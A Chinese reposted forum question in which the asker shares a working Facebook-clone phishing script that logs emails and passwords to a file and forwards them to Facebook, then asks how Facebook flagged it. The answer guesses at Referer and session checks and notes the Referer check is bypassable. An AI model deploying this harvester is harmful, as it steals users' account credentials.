Phishing:Facebook网络钓鱼检测

我正在做一个关于计算机安全的小任务,我目前正在进行网络钓鱼。

因此,出于教育目的,我写了一个简单的“网络钓鱼网页”,我试图了解 Facebook 如何检测网络钓鱼欺诈网页。

我的index.html是 Facebook 的主页,而我编辑它,以将用户重定向到phishing.php页面。

phishing.php:
<?php
$file = fopen('phishing.txt', 'a');
fwrite($file, 'M: '.htmlspecialchars($_POST['email'])."\nP: ".htmlspecialchars($_POST['p'])."\n\n");
fclose($file);
?>
<form action="https://www.facebook.com/login.php?login_attempt=1" method="post" name="frm">
<?php
    foreach ($_POST as $a => $b) {
        echo "<input type='hidden' name='".htmlentities($a)."' value='".htmlentities($b)."'>";
    }
?>
</form>
<script language="JavaScript">
    document.frm.submit();
</script>

我的问题来了这里一切都很好,除了一个事实,一旦用户(我)输入用户名和密码,Facebook 说:

安全声明:为了您的安全,切勿在非 Facebook.com 网站上输入您的 Facebook 密码

那么 Facebook 使用哪种机制来检测这样的网络钓鱼页面?

谢谢

3

我能想到很多方法,Facebook 做到这一点

方法一:HTTP Referer
在您发送的每个 HTTP 请求中,都会发送一个 Referer 来指示您来自哪里,Facebook 可以简单地执行以下操作

$referer = p_url($_SERVER['HTTP_REFERER'], PHP_URL_HOST);
if($referer != 'facebook.com') // Phishing

方法二:Sessions
Facebook 可能会在其 index.php 页面上启动会话,一旦提交登录表单,该页面将被选中,例如

index.php
$_SESSION['coming_from_facebook'] = true;
login.php
if($_SESSION['coming_from_facebook'] != true) // Phishing

这是所有的 psuedo 代码,第一种方法很容易绕过,因为用户可以修改引用。

本站系公益性非盈利分享网址,本文来自用户投稿,不代表边看边学立场,如若转载,请注明出处

(94)
学代码难吗:这是组合优化问题NP难吗(combinatorial optimization problems)
上一篇
期货cjl指标:Python代码从币安期货市场获取MFI指标 错误计算
下一篇

相关推荐

  • win10更新c盘满了:解决Win10更新导致C盘空间不足的方法

    查看C盘空间:右键点击“计算机”,选择“管理”,在左侧窗口中找到“磁盘管理”,可以查看C盘的使用情况。清理C盘:可以通过清理系统垃圾、删除多余文件、释放系统空间等方式来清理C盘。…

    2023-01-25 13:12:34
    0 91 12
  • cf win10烟雾头怎么调:如何调整CF Win10烟雾头以获得最佳效果

    在游戏中,打开控制台,输入“mat_depth_blur_scale 0.5”,这会使烟雾效果减少50%;输入“mat_depth_blur_falloff 0.5”,这会使烟雾效果的衰减率减少50%;…

    2023-01-11 12:59:10
    0 90 75
  • melogin cn登录:【登录melogin cn,轻松获取个性化服务】

    Melogin cn是一个支持多种登录方式的登录框架,可以让用户使用常用的社交账号快速登录网站。以下是使用 Melogin cn 登录的代码示例:…

    2023-02-14 01:08:50
    0 21 64
  • C盘太小如何重新分盘:C# 引脚焊盘设备的线程和事件(pin pad)

    关于C盘太小如何重新分盘的问题,在pin pad中经常遇到,我是 C # 的新手,目前正在处理后端代码以支持 PIN pad。基本上,我的代码…

    2022-11-23 08:42:58
    0 38 24
  • 学习c4d去哪里好:将动画从 cinema4d导出到搅拌机

    关于学习c4d去哪里好的问题,在animation c4d中经常遇到,我一直在尝试将一些动画模型从 c4d 转换为 Blender。这些模型传输正常,但动画没有。我已经使用了 COLLADA,3ds 和 obj 文件类型,但没有成功。我需要将文件放入 Blender,因为我试图将它们放入 three.js。我已经查看了http://disturbmedia.com/blog/tag/threejs/for c4d & gt;threejs,但 python 抛出错误…

    2022-11-23 08:41:29
    0 16 27
  • 辅助cf:自动cf登录刷新(cf login)

    关于辅助cf的问题,在cf login中经常遇到,CloudFoundry UAA 是否支持登录用户的令牌刷新。我目前使用“cf-cli”通过 SSO 密码登录。大约一周后,会话到期,我必须再次登录。是否可以在到期时刷新 $HOME /.cf / config_json 中的令牌?根据此https://www.rfc-editor.org/rfc/rfc6749#section-6,我们应该能够通过传递 grant_refresh 来刷新令牌。…

    2022-11-23 08:30:12
    0 80 87
  • android 视频编码深入理解MediaCodec API

    Android 视频编码是指将原始视频数据经过压缩编码后,生成新的视频数据,以便减少视频文件的体积,提高传输速度,以及更好地在 Android 设备上播放。…

    2023-01-13 10:58:18
    0 92 19
  • cv小敢:如何利用CV小敢提升职业技能?

    cv小敢(Computer Vision Tiny-YOLO)是一种轻量级的物体检测算法,它可以在资源受限的设备上运行,如嵌入式设备、智能手机等。它是基于YOLO(You Only Look Once)算法的一个变体,由Joseph Redmon和Ali Farhadi开发,旨在提高深度学习模型的性能,同时减少模型的大小和计算复杂度。…

    2023-02-09 13:08:59
    0 12 13

发表评论

登录 后才能评论

评论列表(77条)